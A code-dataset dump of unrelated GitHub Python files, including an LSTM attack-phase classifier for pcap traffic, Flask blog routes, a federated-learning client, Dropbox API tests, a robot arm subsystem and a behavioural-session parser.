\"ip_pkt_len\",\n \"ip_checksum_status\", \"ip_ttl\",\n \"stream_index\", \"src_port\", \"dst_port\", \"timestamp\",\n \"time_delta\", \"flags\", \"tcp_flags_ack\", \"tcp_flags_syn\",\n \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\",\n \"icmp_type_code\", \"icmp_checksum_status\"]\n df = df.append(pkt_out_df, ignore_index=True)\n except AttributeError as e:\n # ignore packets that aren't IPv4\n pass\n except Exception as e:\n print(\"No TCP or UDP or ICMP Found\")\n return df\n\ndef csv2vec(df):\n '''\n 读取数据,并采用LabelEncoder+OneHotEncoder编码等方式向量化\n :return: X-数据集\n '''\n x_len_time = df[[\"ip_pkt_len\", \"timestamp\", \"time_delta\", \"src_port\", \"dst_port\", \"ip_ttl\", \"stream_index\"]]\n # 数据标准化\n x_len_time = (x_len_time - x_len_time.min()) / (x_len_time.max() - x_len_time.min())\n # 使用LabelEncoder+OneHotEncoder\n X = np.concatenate([enc.transform(df[[\"proto\", \"ip_checksum_status\", \"tcp_flags_ack\", \"tcp_flags_syn\", \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\", \"icmp_type_code\", \"icmp_checksum_status\"]]),\n x_len_time], axis=1)\n return X\n\ndef create_dataset(dataset_X, dataset_Y, look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset_X) - look_back + 1):\n a = dataset_X[i:(i + look_back), :]\n dataX.append(a)\n dataY.append(dataset_Y[i, :])\n return np.array(dataX, np.float16), np.array(dataY, np.float16)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Attack Phase Judgement\")\n parser.add_argument('-i', '--ip')\n parser.add_argument('-p', '--pcap')\n args = parser.parse_args()\n\n # 判定ip并转成同形式\n test_ip = str(args.ip)\n test_ip_split = test_ip.split(\".\")\n process_ip = float(int(test_ip_split[0]) * 256 ** 3 +\n int(test_ip_split[1]) * 256 ** 2 +\n int(test_ip_split[2]) * 256 +\n int(test_ip_split[3]))\n seq_len = 30\n rootPath = \".\\\\\"\n labelList = [\"label0\", \"label1\", \"label2\", \"label3\", \"label4\", \"label5\", \"label6\"]\n # 加载训练数据生成enc\n df = pd.DataFrame(pd.read_csv(rootPath + \"darpa-trainset.csv\")).fillna(0)\n enc = OneHotEncoder(sparse=False).fit(df[[\"proto\", \"ip_checksum_status\", \"tcp_flags_ack\", \"tcp_flags_syn\", \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\", \"icmp_type_code\", \"icmp_checksum_status\"]])\n\n # 加载测试数据\n testFile = args.pcap\n # testdata = 
\n    # testdata = pd.read_table(testFile, header=0, sep=',')\n    testdata = pcap2df(testFile)\n    # force-cast the dataframe columns to float\n    testdata = pd.DataFrame(testdata, dtype=float)\n    # testdf = pd.DataFrame(testdata).fillna(0)\n    testdf = testdata.fillna(0)\n    testdf_ip = testdf[(testdf['src_ip'] == process_ip) | (testdf['dst_ip'] == process_ip)]\n    testX = csv2vec(testdf_ip)\n    outMax = 0\n    # run one file through every per-stage model and keep the stage that scores highest\n    for i in range(len(labelList)):\n        labelNum = labelList[i]\n        # encY = OneHotEncoder(sparse=False).fit(testdf[[labelNum]])\n        # load the model for stage i\n        model = load_model(rootPath + 'model_1021\\\\' + str(i) + '.h5')\n        # testY = encY.transform(testdf[labelNum].values.reshape(-1, 1))\n        # test_X, test_Y = create_dataset(testX, testY, seq_len)\n        test_X, test_Y = create_dataset(testX, testX, seq_len)\n        y_pred = model.predict(test_X)  # predict() returns per-class scores for each sample\n        out = np.mean(y_pred, 0)  # mean of each column\n        # out = out[~np.isnan(out)]\n        print('The ' + str(i) + 'th y_pred:' + str(out))\n        # keep the largest prediction\n        if out[0] > outMax:\n            outMax = out[0]\n            stage = i\n    print('The stage of this data is: ' + str(stage))\n","repo_name":"FrankieLee1997/multi-lstm","sub_path":"multiLSTMtest.py","file_name":"multiLSTMtest.py","file_ext":"py","file_size_in_byte":9938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"29888166254","text":"from zope import schema, interface\nfrom getpaid.core import interfaces\n\nclass IAuthorizeNetOrder( interface.Interface ):\n    \"\"\" in future use annotation for processor specific options \"\"\"\n\n\nclass IAuthorizeNetOptions(interfaces.IPaymentProcessorOptions):\n    \"\"\"\n    Authorize.Net options\n    \"\"\"\n    server_url = schema.Choice(\n        title=u\"Authorize.net Server URL\", \n        values=(\"Test\",\n                \"Production\")\n    )\n    merchant_id = schema.ASCIILine( title=u\"API Login Id\" )\n    merchant_key = schema.ASCIILine( title=u\"Transaction Key\" )\n    \n    send_test_requests = schema.Bool(\n        title = u'Enable test requests',\n        description = u'If checked, the x_test_request flag will be turned on if '\n                      u'the credit card is one of the following known test cards: '\n                      u'Visa 4007000000027, Visa 4012888818888, AmEx 370000000000002, '\n                      u'Discover 6011000000000012. 
Note: This does not work with '\n u'Automated Recurring Billing (ARB) subscriptions.'\n )\n","repo_name":"collective/getpaid.authorizedotnet","sub_path":"src/getpaid/authorizedotnet/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20749337905","text":"import os\nfrom flask import render_template, request, Blueprint, url_for, current_app\nfrom flaskblog.models import Post\n\nmain = Blueprint('main', __name__)\n\n\n@main.route('/')\n@main.route('/home')\ndef home_func():\n page = request.args.get('page', 1, type=int)\n posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=5)\n for post in posts.items:\n image_file = url_for('static', filename='profile_pics/' + post.author.image_file)\n abs_path = os.path.join(current_app.root_path, 'static', 'profile_pics', post.author.image_file)\n if not os.path.exists(abs_path):\n image_file = url_for('static', filename='profile_pics/default.jpg')\n post.author_file = image_file\n return render_template('home.html', posts=posts)\n\n\n@main.route('/about')\ndef about_func():\n return render_template('about.html', title='About')\n","repo_name":"rrkas-materials/PythonFlaskBlog","sub_path":"flaskblog/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74959203369","text":"import flwr as fl\r\nimport tensorflow\r\nimport random\r\nimport time\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport os\r\nimport time\r\nimport sys\r\n\r\nfrom dataset_utils import ManageDatasets\r\nfrom model_definition import ModelCreation\r\n\r\n\r\nimport warnings\r\nwarnings.simplefilter(\"ignore\")\r\n\r\nimport logging\r\nlogging.getLogger(\"tensorflow\").setLevel(logging.ERROR)\r\n\r\nclass FedClient(fl.client.NumPyClient):\r\n\r\n\tdef __init__(self, cid=0, n_clients=None, epochs=1, \r\n\t\t\t\t model_name = 'None', \r\n\t\t\t\t client_selection = False, \r\n\t\t\t\t solution_name = 'None', \r\n\t\t\t\t aggregation_method = 'None',\r\n\t\t\t\t dataset = '',\r\n\t\t\t\t perc_of_clients = 0,\r\n\t\t\t\t decay = 0,\r\n\t\t\t\t transmittion_threshold = 0.2):\r\n\r\n\t\tself.cid = int(cid)\r\n\t\tself.n_clients = n_clients\r\n\t\tself.model_name = model_name\r\n\t\tself.local_epochs = epochs\r\n\t\tself.non_iid = False\r\n\r\n\t\tself.model = None\r\n\t\tself.x_train = None\r\n\t\tself.x_test = None\r\n\t\tself.y_train = None\r\n\t\tself.y_test = None\r\n\r\n\t\t#resources\r\n\t\tself.battery = random.randint(10, 100)\r\n\t\tself.cpu_cost = 0 \r\n\t\tself.transmittion_prob = 1\r\n\t\tself.transmittion_threshold = transmittion_threshold\r\n\r\n\t\t#logs\r\n\t\tself.solution_name = solution_name\r\n\t\tself.aggregation_method = aggregation_method\r\n\t\tself.dataset = dataset\r\n\r\n\t\tself.client_selection = client_selection\r\n\t\tself.perc_of_clients = perc_of_clients\r\n\t\tself.decay = decay\r\n\r\n\t\t#params\r\n\t\tif self.aggregation_method == 'POC':\r\n\t\t\tself.solution_name = f\"{solution_name}-{aggregation_method}-{self.perc_of_clients}\"\r\n\r\n\t\telif self.aggregation_method == 'DEEV': \r\n\t\t\tself.solution_name = f\"{solution_name}-{aggregation_method}-{self.decay}\"\r\n\r\n\t\telif self.aggregation_method == 'None':\r\n\t\t\tself.solution_name = f\"{solution_name}-{aggregation_method}\"\r\n\r\n\t\tself.x_train, self.y_train, self.x_test, 
self.y_test = self.load_data(self.dataset, n_clients=self.n_clients)\r\n\t\tself.model = self.create_model()\r\n\r\n\tdef load_data(self, dataset_name, n_clients):\r\n\t\treturn ManageDatasets(self.cid).select_dataset(dataset_name, n_clients, self.non_iid)\r\n\r\n\tdef create_model(self):\r\n\t\tinput_shape = self.x_train.shape\r\n\r\n\t\tif self.model_name == 'LR':\r\n\t\t\treturn ModelCreation().create_LogisticRegression(input_shape, 6)\r\n\r\n\t\telif self.model_name == 'DNN':\r\n\t\t\treturn ModelCreation().create_DNN(input_shape, 6)\r\n\r\n\t\telif self.model_name == 'CNN':\r\n\t\t\treturn ModelCreation().create_CNN(input_shape, 6)\r\n\t\t\r\n\r\n\tdef get_parameters(self, config):\r\n\t\treturn self.model.get_weights()\r\n\r\n\r\n\r\n\tdef fit(self, parameters, config):\r\n\t\tselected_clients = []\r\n\t\ttrained_parameters = []\r\n\t\tselected = 0\r\n\t\thas_battery = False\r\n\t\ttotal_time = -1\r\n\r\n\t\tif config['selected_clients'] != '':\r\n\t\t\tselected_clients = [int (cid_selected) for cid_selected in config['selected_clients'].split(' ')]\r\n\t\t\r\n\t\tstart_time = time.process_time()\r\n\t\tif self.cid in selected_clients or self.client_selection == False or int(config['round']) == 1:\r\n\t\t\t\r\n\t\t\t#check if client has some battery available for training\r\n\t\t\tif self.battery >= 0.05:\r\n\t\t\t\tself.model.set_weights(parameters)\r\n\t\t\t\thas_battery = True\r\n\t\t\t\tselected = 1\r\n\t\t\t\thistory = self.model.fit(self.x_train, self.y_train, verbose=1, epochs=self.local_epochs)\r\n\t\t\t\ttrained_parameters = self.model.get_weights()\r\n\t\t\r\n\t\t\t\ttotal_time = time.process_time() - start_time\r\n\t\t\t\tsize_of_parameters = sum(map(sys.getsizeof, trained_parameters))\r\n\t\t\t\tavg_loss_train = np.mean(history.history['loss'])\r\n\t\t\t\tavg_acc_train = np.mean(history.history['accuracy'])\r\n\r\n\t\t\t\tfilename = f\"logs/{self.dataset}/{self.solution_name}/{self.model_name}/train_client.csv\"\r\n\t\t\t\tos.makedirs(os.path.dirname(filename), exist_ok=True)\r\n\r\n\t\t\t\tself.battery = self.battery - (total_time * 0.05)\r\n\t\t\t\tself.cpu_cost = total_time\r\n\r\n\t\t\t#fit_response = {'cid': self.cid, 'transmittion_prob' : self.transmittion_prob,'cpu_cost': total_time}\r\n\r\n\t\t\t#check transmission probability\r\n\t\t\tlast_prob = self.transmittion_prob\r\n\t\t\tself.transmittion_prob = random.uniform(0, 1)\r\n\r\n\t\t\tif last_prob >= self.transmittion_threshold and has_battery:\r\n\t\t\t\twith open(filename, 'a') as log_train_file:\r\n\t\t\t\t\tlog_train_file.write(f\"{config['round']}, {self.cid}, {selected}, {total_time}, {size_of_parameters}, {avg_loss_train}, {avg_acc_train}\\n\")\r\n\t\t\t\t\t\r\n\t\t\t\treturn trained_parameters, len(self.x_train), {'cid': self.cid, 'transmittion_prob' : self.transmittion_prob, 'cpu_cost': total_time}\r\n\r\n\t\t\t#transmission or train failled\r\n\t\t\telse:\r\n\t\t\t\tfilename = f\"logs/{self.dataset}/{self.solution_name}/{self.model_name}/failures.csv\"\r\n\t\t\t\tos.makedirs(os.path.dirname(filename), exist_ok=True)\r\n\r\n\t\t\t\twith open(filename, 'a') as log_failure_file:\r\n\t\t\t\t\tlog_failure_file.write(f\"{config['round']}, {self.cid}, {last_prob}, {self.battery}\\n\")\r\n\r\n\t\t\t\treturn parameters, len(self.x_train), {'cid': self.cid, 'transmittion_prob' : self.transmittion_prob, 'cpu_cost': total_time}\r\n\t\telse:\r\n\t\t\treturn parameters, len(self.x_train), {'cid': self.cid, 'transmittion_prob' : self.transmittion_prob, 'cpu_cost': total_time}\t\t\t\t\r\n\r\n\r\n\r\n\tdef 
evaluate(self, parameters, config):\r\n\t\t\r\n\t\tself.model.set_weights(parameters)\r\n\t\tloss, accuracy = self.model.evaluate(self.x_test, self.y_test, verbose=0)\r\n\t\tsize_of_parameters = sum(map(sys.getsizeof, parameters))\r\n\r\n\t\tfilename = f\"logs/{self.dataset}/{self.solution_name}/{self.model_name}/evaluate_client.csv\"\r\n\t\tos.makedirs(os.path.dirname(filename), exist_ok=True)\r\n\r\n\t\twith open(filename, 'a') as log_evaluate_file:\r\n\t\t\tlog_evaluate_file.write(f\"{config['round']}, {self.cid}, {size_of_parameters}, {loss}, {accuracy}\\n\")\r\n\r\n\t\tevaluation_response = {\r\n\t\t\t\"cid\" : self.cid,\r\n\t\t\t\"accuracy\" : float(accuracy),\r\n\t\t\t\"transmittion_prob\" : self.transmittion_prob,\r\n\t\t\t\"cpu_cost\" : self.cpu_cost,\r\n\t\t\t\"battery\" : self.battery\r\n\t\t}\r\n\r\n\t\treturn loss, len(self.x_test), evaluation_response\r\n\r\n\r\ndef main():\r\n\t\r\n\tclient = FedClient(\r\n\t\t\t\t\tcid = int(os.environ['CLIENT_ID']), \r\n\t\t\t\t\tn_clients = None, \r\n\t\t\t\t\tmodel_name = os.environ['MODEL'], \r\n\t\t\t\t\tclient_selection = not os.environ['CLIENT_SELECTION'] == 'False', \r\n\t\t\t\t\tepochs = int(os.environ['LOCAL_EPOCHS']), \r\n\t\t\t\t\tsolution_name = os.environ['SOLUTION_NAME'],\r\n\t\t\t\t\taggregation_method = os.environ['ALGORITHM'],\r\n\t\t\t\t\tdataset = os.environ['DATASET'],\r\n\t\t\t\t\tperc_of_clients = float(os.environ['POC']),\r\n\t\t\t\t\tdecay = float(os.environ['DECAY']),\r\n\t\t\t\t\ttransmittion_threshold = float(os.environ['TRANSMISSION_THRESHOLD'])\r\n\t\t\t\t\t)\r\n\r\n\tfl.client.start_numpy_client(server_address=os.environ['SERVER_IP'], client=client)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()","repo_name":"AllanMSouza/DEEV","sub_path":"Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28857500867","text":"from ctre import WPI_TalonSRX\nfrom ctre import WPI_VictorSPX\nfrom wpilib.command import Subsystem\nfrom Subsystems.pid import PID\nfrom wpilib import Encoder\nfrom wpilib import DigitalInput\nimport wpilib\nimport ctre\n\nclass Arm(Subsystem):\n def __init__(self, robot):\n super().__init__(\"Arm\")\n self.robot = robot\n\n self.peakCurrentLimit = 30\n self.PeaKDuration = 50\n self.continuousLimit = 15\n\n motor = {}\n\n for name in self.robot.RobotMap.motorMap.motors:\n motor[name] = self.robot.Creator.createMotor(self.robot.RobotMap.motorMap.motors[name])\n\n self.motors = motor\n\n for name in self.motors:\n self.motors[name].setInverted(self.robot.RobotMap.motorMap.motors[name]['inverted'])\n # drive current limit\n self.motors[name].configPeakCurrentLimit(self.peakCurrentLimit, 10)\n self.motors[name].configPeakCurrentDuration(self.PeaKDuration, 10)\n self.motors[name].configContinuousCurrentLimit(self.continuousLimit, 10)\n self.motors[name].enableCurrentLimit(True)\n\n self.AEnc = Encoder(4, 5, False, Encoder.EncodingType.k4X)\n self.Zero = DigitalInput(6)\n\n self.kp = 0.00035\n self.ki = 0.00000000001\n self.kd = 0.0000001\n\n self.ArmPID = PID(self.kp, self.ki, self.kd)\n\n def log(self):\n wpilib.SmartDashboard.putNumber('armEnc', self.getHeight())\n wpilib.SmartDashboard.putNumber('Zero', self.getZeroPos())\n\n \"\"\"\n Get Functions\n \"\"\"\n\n def getHeight(self):\n # get encoder values\n return self.AEnc.get()\n\n def getZeroPos(self):\n # get zero position of arm\n return self.Zero.get()\n\n \"\"\"\n set functions\n \"\"\"\n def set(self, 
set(self, power):\n        self.motors['RTArm'].set(ctre.ControlMode.PercentOutput, power)\n        self.motors['LTArm'].set(ctre.ControlMode.PercentOutput, power)\n\n    def stop(self):\n        self.set(0)\n\n    def resetHeight(self):\n        self.AEnc.reset()\n","repo_name":"BTanjerine/FRC2019DeepSpaceCode","sub_path":"Subsystems/arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71914398888","text":"\"\"\"\nThis is a Dropbox API. All information can be found at the below web address:\nhttps://www.dropbox.com/developers/documentation/http/documentation.\n\"\"\"\nimport json\nimport time\nimport os\nfrom helper_library_DB import Dropbox\nfrom helper_library_DB import Fake\n\n\nd = Dropbox()\nf = Fake()\n\n# Objective - Test if the api can upload a file to DB.\n# Expected Outcome - Assert http status code == 200 and use the search\n# api to see that the file exists.\ndef test_upload_validation():\n\n    # Creating a fake directory name and file (first 5 lines)\n    filename = f.create_file_name()\n    f.create_file(filename)\n    base_dir = \"{\\\"path\\\":\\\"/\"\n    end_dir = filename+\"\\\"}\"\n    # plain concatenation: os.path.join would inject OS-specific separators\n    # into what is really a JSON header value, not a filesystem path\n    db_path = base_dir + end_dir\n\n    my_headers = {\n        \"Authorization\": d.authorization,\n        \"Content-Type\": \"application/octet-stream\",\n        \"Dropbox-API-Arg\": db_path\n    }\n    my_data = open(filename, \"rb\").read()\n    r1 = d.db_upload(my_headers=my_headers,my_data=my_data)\n\n    # Have to set a delay, otherwise the assert will check before the file has\n    # been uploaded into the DB database.\n    time.sleep(10)\n\n    my_data2 = {\"path\": \"\", \"query\": filename}\n    r2 = d.db_search(my_data2=my_data2)\n    check_assert = json.loads(r2.text)['matches'][0]['metadata']['name']\n    assert r1.status_code == 200 and check_assert == filename\n\n\"\"\"\n# Objective - Input an acceptable upload path to upload a file to DB.\n# Expected Outcome - Assert that the file was uploaded using the search\n# api.\ndef test_upload_path():\n    assert True == False\n\n# Objective - Input an unacceptable upload path on DB (use incorrect\n# formats, i.e. use '\\' instead of '/')\n# Expected Outcome - Assert that http error code != 200 and response\n# is returned with \"path does not match...\"\ndef test_upload_path_invalid():\n    assert True == False\n\n# Objective - Make sure there is an existing file before uploading the\n# same file. Select mode:add when uploading.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# find the file name that has been overwritten with \"(2).ext\"\ndef test_upload_mode_add():\n    assert True == False\n\n# Objective - Make sure there is an existing file before uploading the\n# same file. Select mode:upload when uploading.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# confirm there is not a duplicate filename.\ndef test_upload_mode_override():\n    assert True == False\n\n# Objective - Make sure there is an existing file before uploading the\n# same file. Select mode:update when uploading.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# find same file name with appended \"conflicted copy\" string.\ndef test_upload_mode_update():\n    assert True == False\n\n# Objective - Test to see what makes the upload mode invalid. 
Ex: Leave\n# the field blank when uploading.\n# Expected Outcome - Assert using the search api and find the uploaded\n# file with appended \"(2).ext\" after the file name.\ndef test_upload_mode_invalid():\n assert True == False\n\n# Objective - Test to see if DB will autorename the file if there is a\n# conflict with the mode.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# find the same file (DB will not autorename the file).\ndef test_upload_autorename_false()\n assert True == False\n\n# Objective - Test to see if DB will autorename the file if there is a\n# conflict with the mode.\n# Expected Outcome - Assert http code == 200 and use the search api to\n# find the amended file name (DB will autorename the file).\ndef test_upload_authorname_true():\n assert True == False\n\n# Objective - See if inputting a timestamp when a user uploads the file\n# will appear on the \"client modified\" response.\n# Expected Outcome - Assert http code == 200 and use the search api and\n# assert the \"client modified\" field of the metadata is the same as\n# what was inputted\ndef test_upload_client_modified_future():\n assert True == False\n\n@pytest.mark.mute\n# Objective - Upload the file with mute: True.\n# Expected Outcome - User should not receive a notification on this\n# modification.\ndef test_upload_mute_true():\n assert True == False\n\n@pytest.mark.mute\n# Objective - Upload the file with mute: False.\n# Expected Outcome - User should receive a notification on any\n# modification to the file.\ndef test_upload_mute_false():\n assert True == False\n\n# Objective - Test to see if original uploaded file size is the same as\n# the size response.\n# Expected Outcome - Assert using the search api and confirm that the\n# size field == what was uploaded.\ndef test_upload_response_size():\n assert True == False\n\n# Objective - Upload a file and make sure the file path is correct.\n# Expected Outcome - Assert http response == 200 and use the search\n# api and check to see if \"path_lower\" field starts with a '/'\ndef test_upload_response_pathlower():\n assert True == False\n\n# Objective - Create an error that returns a malformed response.\n# Expected Outcome - Assert http code != 200 and will receive a\n# malformed response error message stating that the file could not be\n# saved.\ndef test_upload_error_malformed_path():\n assert True == False\n\n# Objective - Create a situation that does not give the user permission\n# to write to the target location.\n# Expected Outcome - Assert http code != 200 and use the search api to\n# assert the file does not exist.\ndef test_upload_error_no_write_permission():\n assert True == False\n\n# Objective - Create a situation where the user goes over the available\n# space (bytes) when uploading a file.\n# Expected Outcome - Assert http code != 200 and use the search api to\n# assert the file does not exist.\ndef test_upload_error_insufficient_space():\n assert True == False\n\n# Objective - Upload a file or folder with an inappropriate name or name\n# format.\n# Expected Outcome - Assert http code != 200 and use the search api to\n# assert the file does not exist.\ndef test_upload_error_disallowed_name():\n assert True == False\n\n\"\"\"","repo_name":"superwdy/DB","sub_path":"api_tests/test_files_upload.py","file_name":"test_files_upload.py","file_ext":"py","file_size_in_byte":5980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44866172378","text":"import os\nimport 
warnings\n\nimport numpy as np\nimport pandas as pd\nimport scipy.io as sio\n\nclass parseSess:\n\n def __init__(self,filepath):\n\n if not os.path.exists(filepath):\n print('File not found: ' + filepath)\n raise OSError(filepath)\n mysess = sio.loadmat(filepath, squeeze_me=True)\n self.fname = os.path.split(filepath)[1]\n self.bpod = mysess['SessionData']\n try:\n self.params = pd.Series({n: np.asscalar(self.bpod['Settings'].item()['GUI'].item()[n]) for n in self.bpod['Settings'].item()['GUI'].item().dtype.names})\n except Exception as e:\n print(e)\n self.params = pd.Series()\n warnings.warn('Could not load settings.')\n self.parse()\n\n def parse(self):\n\n # self.parsedData = pd.DataFrame({n:self.bpod['Custom'].item()[n].item() for n in ['BaitedL', 'BrokeFix', 'CenterPokeDur', 'ChoiceLeft','EarlySout', 'Grace', 'RewardMagnitude', 'Rewarded','SidePokeDur', 'StimGuided']}).iloc[:-1,:]\n\n nTrials = np.asscalar(self.bpod['nTrials'])\n tsState0 = self.bpod['TrialStartTimestamp'].item()\n\n ChoiceLeft = np.full(nTrials,False)\n ChoiceRight = np.full(nTrials,False)\n ChoiceMiss = np.full(nTrials,False)\n Rewarded = np.full(nTrials,False)\n BrokeFix = np.full(nTrials,False)\n EarlySout = np.full(nTrials,False)\n CheckedOther = np.full(nTrials,False)\n BaitedL = np.full(nTrials,False)\n StimGuided = np.full(nTrials,False)\n Grace = np.full(nTrials,False)\n\n CenterPokeDur = np.full(nTrials,np.nan)\n SidePokeDur = np.full(nTrials,np.nan)\n\n tsChoice = np.full(nTrials,np.nan)\n tsPokeL = [[]]*nTrials\n tsPokeC = [[]]*nTrials\n tsPokeR = [[]]*nTrials\n assert(not np.isscalar(tsState0)), \"Session is only 1 trial long. Aborting.\"\n assert(len(tsState0) > 20), \"Session is only {} trials long. Aborting.\".format(len(tsState0))\n tsState0 = tsState0 - tsState0[0]\n\n PortL = 'Port' + str(int(self.params.Ports_LMR))[0] + 'In'\n PortC = 'Port' + str(int(self.params.Ports_LMR))[1] + 'In'\n PortR = 'Port' + str(int(self.params.Ports_LMR))[2] + 'In'\n stateTraj = [[]]*nTrials\n\n for iTrial in range(nTrials):\n listStates = self.bpod['RawData'].item()['OriginalStateNamesByNumber'].item()[iTrial]\n stateTraj[iTrial] = listStates[self.bpod['RawData'].item()['OriginalStateData'].item()[iTrial]-1] #from 1- to 0-based indexing\n\n if any([PortL in self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item().dtype.names]) :\n tsPokeL[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item()[PortL].item()\n\n if any([PortC in self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item().dtype.names]) :\n tsPokeC[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item()[PortC].item()\n\n if any([PortR in self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item().dtype.names]) :\n tsPokeR[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item()[PortR].item()\n\n ChoiceMiss[iTrial] = any(['choice_miss' in stateTraj[iTrial]])\n Rewarded[iTrial] = any([n.startswith('water_') for n in stateTraj[iTrial]])\n BrokeFix[iTrial] = any(['BrokeFix' in stateTraj[iTrial]])\n EarlySout[iTrial] = any(['EarlySout' in stateTraj[iTrial]])\n StimGuided[iTrial] = any(['Cin_late' in stateTraj[iTrial]])\n Grace[iTrial] = any(['grace' in n for n in stateTraj[iTrial]])\n\n ndx_start_S = np.array([n.startswith('start_') for n in stateTraj[iTrial]])\n if ndx_start_S.any():\n start_S = stateTraj[iTrial][ndx_start_S].item()\n tsChoice[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[start_S].item()[0]\n\n 
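# the trailing 'start_L*' / 'start_R*' state name encodes the chosen side;\n                # its onset timestamp (tsChoice above) marks the moment of choice\n                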
ChoiceLeft[iTrial] = start_S.startswith('start_L')\n if ChoiceLeft[iTrial]:\n CheckedOther[iTrial] = (tsPokeR[iTrial] > tsChoice[iTrial]).any()\n\n ChoiceRight[iTrial] = start_S.startswith('start_R')\n if ChoiceRight[iTrial]:\n CheckedOther[iTrial] = (tsPokeL[iTrial] > tsChoice[iTrial]).any()\n\n if EarlySout[iTrial]:\n grace_state = np.unique(stateTraj[iTrial][['grace' in n for n in stateTraj[iTrial]]]).item()\n SidePokeDur[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[grace_state].item().ravel()[-2] - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[start_S].item()[0]\n else:\n SidePokeDur[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['ITI'].item()[1] - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[start_S].item()[0]\n ChoicePortOut = PortL if ChoiceLeft[iTrial] else PortR\n ChoicePortOut = ChoicePortOut[:-2] + 'Out'\n if ChoicePortOut in self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item().dtype.names:\n candidates = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['Events'].item()[ChoicePortOut].item()\n candidates = candidates if np.isscalar(candidates) else candidates.astype(float)\n thresh = tsChoice[iTrial]\n if Grace[iTrial]:\n grace_state = np.unique(stateTraj[iTrial][['grace' in n for n in stateTraj[iTrial]]]).item()\n thresh = max(thresh,self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[grace_state].item().max())\n if (candidates > thresh).any():\n if not np.isscalar(candidates):\n candidates = min(candidates[candidates > thresh])\n SidePokeDur[iTrial] = candidates - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()[start_S].item()[0]\n\n if StimGuided[iTrial]:\n CenterPokeDur[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['Cin_late'].item()[1] - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['Cin_early'].item()[0]\n else:\n CenterPokeDur[iTrial] = self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['Cin_early'].item()[1] - self.bpod['RawEvents'].item()['Trial'].item()[iTrial]['States'].item()['Cin_early'].item()[0]\n\n BaitedL = self.bpod['Custom'].item()['BaitedL'].item().astype(bool)\n isChoiceBaited = np.logical_or(np.logical_and(ChoiceLeft,BaitedL),\n np.logical_and(ChoiceRight,~BaitedL),\n )\n\n assert(isChoiceBaited[Rewarded].all()), \"Impossible trials found: unbaited AND rewarded.\"\n\n self.parsedData = pd.DataFrame({'iTrial': np.arange(nTrials),\n 'isChoiceLeft': ChoiceLeft, 'isChoiceRight': ChoiceRight, 'isBaitedLeft':BaitedL,'isStimGuided':StimGuided,'isGraceVisited':Grace,\n 'isChoiceMiss': ChoiceMiss,'isRewarded': Rewarded,'isBrokeFix': BrokeFix, 'isEarlySout': EarlySout, 'isChoiceBaited':isChoiceBaited,'isCheckedOther':CheckedOther,\n 'stateTraj': stateTraj,'tsState0': tsState0, 'tsChoice': tsChoice, 'tsPokeL': tsPokeL, 'tsPokeC': tsPokeC, 'tsPokeR': tsPokeR,'CenterPokeDur':CenterPokeDur,'SidePokeDur':SidePokeDur})\n\n self.parsedData = self.parsedData.set_index('iTrial')\n","repo_name":"tsgouvea/tasksuite_analysis","sub_path":"tasks/blind.py","file_name":"blind.py","file_ext":"py","file_size_in_byte":7864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21879985145","text":"class Customer:\n price = None\n\n def __init__(self):\n self.discount = 0\n self.price = 0\n self.totalprice = 0\n\n def get_price(self):\n return self.price\n\n def 
